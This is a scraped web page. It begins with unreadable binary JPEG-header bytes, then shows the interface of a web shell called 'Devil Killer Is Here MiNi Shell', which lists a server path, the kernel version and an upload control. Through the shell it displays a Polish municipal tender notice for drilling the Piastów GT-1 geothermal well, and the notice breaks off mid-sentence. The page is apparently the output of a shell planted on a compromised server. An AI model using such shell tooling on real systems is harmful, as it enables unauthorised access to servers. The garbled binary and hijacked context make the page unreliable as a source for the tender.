JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20220315/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20220315/0008563002-N-2022.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Roboty budowlane<br/> Wykonanie otworu poszukiwawczo-rozpoznawczego<br/><br/>Piastów GT-1 w miejscowości Piastów </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Gmina Miasto Piastów</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 013269350</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">11 Listopada 2</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Piastów</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">05-820</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">mazowieckie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL913 - Warszawski zachodni</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">22 77 05 200</span></h3> <h3 class="mb-0">1.5.8.) Numer faksu: <span class="normal">22 77 05 200</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">umpiastow@piastow.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.piastow.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Wykonanie otworu poszukiwawczo-rozpoznawczego<br/><br/>Piastów GT-1 w miejscowości Piastów </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-1aa0bd30-a39c-11ec-80f8-1ad70aec7fa4</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2022/BZP 00085630</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">02</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2022-03-15</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2022/BZP 00010230/03/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.1.5 Wykonanie otworu poszukiwawczo - rozpoznawczego Piastów GT-1 w miejscowości Piastów</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.15.) Nazwa projektu lub programu</h3> <p class="mb-0"> Jest dofinansowane ze środków Narodowego Funduszu Ochrony Środowiska i Go-spodarki Wodnej w ramach programu priorytetowego nr 2.10 „Udostępnianie wód termalnych w Polsce”. </p> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://bip.piastow.pl/ <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">: W niniejszym postępowaniu o<br/>udzielenie zamówienia komunikacja między Zamawiającym a Wykonawcami odbywa się przyużyciu<br/>miniPortalu https://miniportal.uzp.gov.pl/, ePUAPu https://epuap.gov.pl/wps/portal oraz poczty<br/>elektronicznej - zamowieniapubliczne@piastow.pl.</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">Wymagania techniczne i organizacyjne wysyłania i odbierania<br/>dokumentówelektronicznych,elektronicznych kopii dokumentów i oświadczeń oraz informacji<br/>przekazywanych przyich użyciuopisane zostały w Regulaminie korzystania z systemu miniPortal oraz<br/>Warunkachkorzystania zelektronicznej platformy usług administracji publicznej (ePUAP).</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Zgodnie z art. 13 ust. 1 i 2 rozporządzenia<br/>ParlamentuEuropejskiego i Rady (UE) 2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób<br/>fizycznych wzwiązku z przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich<br/>danych orazuchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o danych) (Dz. U. UE L119 z dnia<br/>4 maja 2016r., str. 1; zwanym dalej „RODO”) informujemy, że:• administratorem Pani/Pana danych osobowych jest:Burmistrz Miasta Piastowa, ul. 11 Listopada 2, 05-820 Piastów;• administrator<br/>wyznaczył inspektora danych osobowych w Urzędzie Miejskim, kontakt: adres e-mail iod@piastow.pl</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">nie dotyczy</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">ZP.271.04.2022</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Roboty budowlane</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przedmiotem zamówienia jest robota budowlana polegająca na wykonaniu otworu poszuki-wawczo - rozpoznawczego Piastów GT-1 w miejscowości Piastów.<br/>Przedmiotem zamówienia jest Wykonanie otworu poszukiwawczo-rozpoznawczego Piastów GT-1 w miejscowości Piastów zgodnie z zatwierdzonym „Projektem robót geologicznych na wykona-nie otworu poszukiwawczo – rozpoznawczego wód termalnych Piastów GT-1 w miejscowości Piastów” oraz „Dodatkiem nr 1 do „Projektu robót geologicznych na wykonanie otworu poszu-kiwawczo – rozpoznawczego wód termalnych Piastów GT-1 w miejscowości Piastów”.<br/>Celem projektowanych prac jest rozpoznanie występowania i wykształcenia utworów wodono-śnych, określenie parametrów hydrogeologicznych oraz mineralizacji, wydajności i temperatury wód w utworach jury dolnej poprzez odwiercenie otworu poszukiwawczo-rozpoznawczego Pia-stów GT-1 o głębokości 1 940 m (+/-10%). <br/>Projektowane parametry otworu badawczego Piastów GT-1: <br/>•	temperatura wody: 43-47℃; <br/>•	wydajność: 120 m3/h; <br/>•	mineralizacja: 90 g/dm3.<br/>Roboty geologiczne będą wykonywane zgodnie z „Projektem robót geologicznych na wykonanie otworu poszukiwawczo – rozpoznawczego wód termalnych Piastów GT-1 w miejscowości Pia-stów”, zatwierdzonym decyzją Marszałka Województwa Mazowieckiego Nr PE-I.7430.50.2020.ES z dnia 26.08.2020 r. oraz „Dodatkiem nr 1 do „Projektu robót geologicznych na wykonanie otwo-ru poszukiwawczo – rozpoznawczego wód termalnych Piastów GT-1 w miejscowości Piastów”. (dalsza część opisu SWZ) </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45255500-4 - Roboty wiertnicze i górnicze</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">45000000-7 - Roboty budowlane</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja do --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2023-12-31</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.14.) Przedmiot, wielkość lub zakres oraz warunki zamówień na podobne usługi lub roboty budowlane: <span class="normal">Zakres robót objętych zamówieniami o których mowa wyżej może dotyczyć robót z branży: budowlanej.</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1) Przy wyborze najkorzystniejszej oferty Zamawiający będzie się kierował następującymi kryteriami oceny ofert:<br/><br/> cena – waga kryterium 60 %;<br/> doświadczenie Kierownika Ruchu Zakładu - waga kryterium 20%;<br/> doświadczenie Kierownika Wiertni - waga kryterium 10%;<br/> termin płatności faktur - waga kryterium 10%.<br/><br/>Kryterium doświadczenie Kierownika Ruchu Zakładu<br/>Sposób oceny ofert w kryterium doświadczenie Kierownika Ruchu Zakładu. Wartość punktowa za ww. kryterium wyliczona jest wg wzoru:<br/>Liczba punktów = d_KRZn/d_KRZmax x 20<br/>DKRZmax – najwyższe zaoferowane doświadczenie Kierownika Ruchu Zakładu<br/>DKRZn – doświadczenie Kierownika Ruchu Zakładu w ocenianej ofercie<br/>Zamawiający przyjmuje 1% = 1 punkt<br/>Maksymalna ilość uzyskanych punktów w ww. kryterium wynosi 20.<br/>Obliczenia dokonywane będą z dokładnością do dwóch miejsc po przecinku.<br/><br/>Kryterium doświadczenie Kierownika Wiertni<br/>Sposób oceny ofert w kryterium doświadczenie Kierownika Wiertni. Wartość punktowa za ww. kryterium wyliczona jest wg wzoru:<br/>Liczba punktów = d_KWn/d_KWmax x 10<br/>DKWn – doświadczenie Kierownika Wiertni w ocenianej ofercie<br/>DKWmax – najwyższe zaoferowane doświadczenie Kierownika Wiertni<br/>Zamawiający przyjmuje 1% = 1 punkt<br/>Maksymalna ilość uzyskanych punktów w ww. kryterium wynosi 10.<br/>Obliczenia dokonywane będą z dokładnością do dwóch miejsc po przecinku<br/>Kryterium termin płatności faktur<br/>Sposób oceny ofert w kryterium termin płatności faktur. Wartość punktowa za ww. kryterium wyliczona jest wg punktacji:	<br/>Wykonawca podaje termin płatności faktur w dniach: 14, 21 lub 30 dni.<br/>Zamawiający przyzna za poszczególne terminy płatności faktur niżej wymienione punkty:<br/> 14 dni - 0 pkt.;<br/> 21 dni - 5 pkt.;<br/> 30 dni - 10 pkt.<br/> Maksymalna ilość uzyskanych punktów w ww. kryterium wynosi 20.<br/>Wymagany / oceniany przez Zamawiającego minimalny termin płatności faktur to 14 dni.<br/>Wymagany / oceniany przez Zamawiającego maksymalny termin płatności faktur to 30 dni.<br/>UWAGA!!! Jeżeli Wykonawca nie zaoferuje żadnego terminu płatności faktur lub zaoferuje inny, wymagany / oceniany przez Zamawiającego jego oferta zostanie odrzucona. <br/>Obliczenia dokonywane będą z dokładnością do dwóch miejsc po przecinku.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Procentowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">doświadczenie Kierownika Ruchu Zakładu</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20</span></h3> <h3 class="mb-0">Kryterium 3</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">doświadczenie Kierownika Wiertni</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">10</span></h3> <h3 class="mb-0">Kryterium 4</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">termin płatności faktur</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">10</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <p class="mb-0">Art. 109 ust. 1 pkt 5</p> <p class="mb-0">Art. 109 ust. 1 pkt 7</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> •	sytuacji ekonomicznej lub finansowej - Zamawiający wymaga, aby Wykonawca posiadał: dokument potwierdzający, że Wykonawca jest ubezpieczony od odpowiedzialności cywil-nej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia, na sumę gwarancyjną tego ubezpieczenia nie mniejszą niż 12 000 000,00 złotych (słownie: dwanaście milionów złotych);<br/>•	zdolności technicznej lub zawodowej - Wykonawca spełni warunek jeżeli wykaże że: <br/>- wykonał nie wcześniej niż w okresie ostatnich 5 lat, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie - roboty budowlane polegające na odwierceniu lub rekonstrukcji co najmniej 2 otworów wiertniczych o głębokości nie mniejszej niż 1 200 m.<br/>UWAGA!!! Wykonawca przedstawi dowody określające czy te roboty budowlane zostały wykonane należycie<br/>- skieruje do realizacji zamówienia osoby odpowiedzialne za świadczenie robót, posiadające kwalifikacje zawodowe niezbędne do wykonania zamówienia publicznego, tj. min.:<br/>1 Kierownika Ruchu Zakładu - posiadającego uprawnienia Kierownika Ruchu Zakładu wykonującego roboty geologiczne metodą otworową wynikające z ustawy z dnia 9 czerwca 2011 r. Prawo geologiczne i górnicze, posiadającego co najmniej dwuletnie doświadczenie na stanowisku Kierownika Ruchu Zakładu oraz pełnił funkcję Kierownika Ruchu Zakładu podczas wykonywania co najmniej 3 otworów geotermalnych o głębokości co najmniej 1200 m p.p.t.<br/>2 Kierowników Wiertni - posiadających uprawnienia wyższego dozoru ruchu w specjalności wiertniczej, posiadającego co najmniej 2 letnie doświadczenie w sprawowaniu funkcji Kierownika Wiertni oraz pełnił funkcję Kierownika Wiertni podczas wykonywania lub rekonstrukcji co najmniej 2 otworów wiertniczych o głębokości co najmniej 1200 m p.p.t. z czego co najmniej 1 był otworem geotermalnym; <br/>4 Wiertaczy - posiadających uprawnienia dozoru ruchu w specjalności wiertniczej, posiadających co najmniej 2 letnie doświadczenie w sprawowaniu funkcji wiertacza oraz pełniących funkcję wiertacza podczas wykonywania lub rekonstrukcji co najmniej 2 otworów wiertniczych o głębokości co najmniej 1200 m p.p.t. <br/><br/><br/>UWAGA!!! Zamawiający nie dopuszcza łączenia wyżej wskazanych funkcji w zakresie uprawnień i doświadczenia tj. nie dopuszcza, aby jedna osoba sprawowała więcej niż jedną funkcję w trakcie realizacji zadania stanowiącego przedmiot zamówienia w niniejszym postępowaniu. <br/>Jako otwór geotermalny Zamawiający rozumie otwór wiertniczy wykonywany na podstawie projektu robót geologicznych w celu poszukiwania i/lub rozpoznawania zasobów wód termalnych, który został zakończony wykonaniem dokumentacji hydrogeologicznej ustalającej zasoby wód termalnych lub dokumentacji geologicznej innej, niekończącej się udokumentowaniem zasobów wód termalnych.<br/><br/>•	wykazu narzędzi, wyposażenia zakładu lub urządzeń technicznych dostępnych Wyko-nawcy w celu wykonania zamówienia publicznego wraz z informacją o podstawie do dyspono-wania tymi zasobami: - Wykonawca spełni warunek jeżeli dysponuje tj. urządzenie wiertnicze o zdolności technicznej wykonania otworu wiertniczego o głębokości 1940 m (+/-10%), wy-posażone w system oczyszczania płuczki (co najmniej: koryta płuczkowe, sita wibracyjne, wirówkę dekantacyjną, mud-cleaner z hydrocyklonami),<br/>Oceniając zdolność techniczną lub zawodową, Zamawiający może, na każdym etapie postępowa-nia, uznać, że Wykonawca nie posiada wymaganych zdolności, jeżeli posiadanie przez Wykonawcę sprzecznych interesów, w szczególności zaangażowanie zasobów technicznych lub zawodowych Wykonawcy w inne przedsięwzięcia gospodarcze Wykonawcy może mieć negatywny wpływ na realizację zamówienia. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">a) Informacje zawarte w oświadczeniu, stanowi<br/>wstępne potwierdzenie, że Wykonawca nie podlega wykluczeniu oraz spełnia warunki udziału w<br/>postępowaniu.<br/>b) W przypadku wspólnego ubiegania się o zamówienie przez Wykonawców oświadczenie o których mowa w pkt. 1 składa każdy z Wykonawców. Oświadczenie to, maja potwierdzać spełnianie warunków udziału w postępowaniu oraz brak podstaw wykluczenia w zakresie, w jakim każdy z Wykonawców<br/>wykazuje spełnienie warunków udziału w postępowaniu.<br/>c) W przypadku polegania przez Wykonawcę na zdolnościach lub sytuacji podmiotów udostępniających zasoby Wykonawca przedstawia wraz z oświadczeniem o którym mowa w pkt. 1<br/>oświadczenie podmiotu udostępniającego zasoby, potwierdzające brak podstaw wykluczenia tego<br/>podmiotu oraz odpowiednio spełnianie warunków udziału w postępowaniu w zakresie w jakim Wykonawca powołuje się a jego zasoby.<br/>1) Do oferty Wykonawca zobowiązany jest dołączyć aktualne na dzień składania ofert oświadczenie, o<br/>którym mowa w art. 125 ust. 1 ustawy Pzp. o spełnieniu warunków udziału w postępowaniu oraz o<br/>braku podstaw do wykluczenia z postępowania w zakresie wskazanym przez Zamawiającego.<br/>Informacje zawarte w oświadczeniu, tymczasowo zastępują wymagane przez Zamawiającego podmiotowe środki dowodowe – wg załącznika nr 3 do SWZ.<br/>a) oświadczenie Wykonawcy, w zakresie art. 108 ust. 1 pkt. 5 ustawy Pzp, o braku przynależności do<br/>tej samej grupy kapitałowej, w rozumieniu ustawy z dnia 16 lutego 2007 roku o ochronie konkurencji i<br/>konsumentów (Dz. U. z 2019 roku, poz. 369), z innym Wykonawcą, który złożył odrębną ofertę, ofertę<br/>częściową lub wniosek o dopuszczenie do udziału w postępowaniu, albo oświadczenie o<br/>przynależności do tej samej grupy kapitałowej wraz z dokumentami lub informacjami potwierdzającymi<br/>przygotowanie oferty, oferty częściowej lub wniosku o dopuszczenie do udziału w postępowaniu<br/>niezależnie od innego Wykonawcy należącego do tej samej grupy kapitałowej - wg załącznika nr 6 do<br/>SWZ;<br/>b) oświadczenie Wykonawcy o aktualności informacji zawartych w oświadczeniu, o którym mowa w art.<br/>125 ust. 1 ustawy Pzp, w zakresie podstaw wykluczenia z postępowania wskazanych przez<br/>Zamawiającego w 11 pkt. 1 SWZ, o którym mowa w § 2 ust. 1 pkt 7 oraz § 3 rozporządzenia Ministra<br/>Rozwoju, Pracy i Technologii z dnia 23 grudnia 2020 r. w sprawie podmiotowych środków dowodowych<br/>oraz innych dokumentów lub oświadczeń, jakich może żądać Zamawiający od Wykonawcy (Dz. U. z<br/>2020 roku, poz. 2415);<br/>c) odpis lub informacja z Krajowego Rejestru Sądowego lub z Centralnej Ewidencji i Informacji o<br/>Działalności Gospodarczej, w zakresie art. 109 ust. 1 pkt. 4 ustawy, sporządzony nie wcześniej niż 3<br/>miesiące przed jej złożeniem, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji;</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">d)	ubezpieczenie od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia, na sumę gwarancyjną tego ubezpieczenia nie mniejszą niż 12 000 000,00 złotych;<br/>e) wykaz robót budowlanych tj. roboty budowlane polegające na odwierceniu lub rekonstrukcji co najmniej 2 otworów wiertniczych o głębokości nie mniejszej niż 1 200 m. wykonanych w okresie ostatnich 5 lat, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie, wraz z podaniem ich rodzaju, wartości, daty i miejsca wykonania oraz podmiotów, na rzecz których roboty te zostały wykonane - według wzoru określonego w załączniku nr 6 do SWZ;<br/>f) dowody określające, czy te roboty budowlane zostały wykonane należycie;<br/>UWAGA!!! Dowodami, o których mowa powyżej, są referencje bądź inne dokumenty sporządzone przez podmiot, na rzecz którego roboty budowlane zostały wykonywane, a jeżeli Wykonawca z przyczyn niezależnych od niego nie jest w stanie uzyskać tych dokumentów – inne odpowiednie dokumenty;<br/>g) wykaz osób, skierowanych przez Wykonawcę do realizacji zamówienia publicznego, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi wraz z informacjami na temat ich kwalifikacji zawodowych, uprawnień, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia publicznego, a także zakresu wykonywanych przez nie czynności oraz informacją o podstawie do dysponowania tymi osobami - wg załącznika nr 7 do SWZ;<br/>h) wykaz narzędzi, wyposażenia zakładu lub urządzeń technicznych dostępnych Wykonawcy w 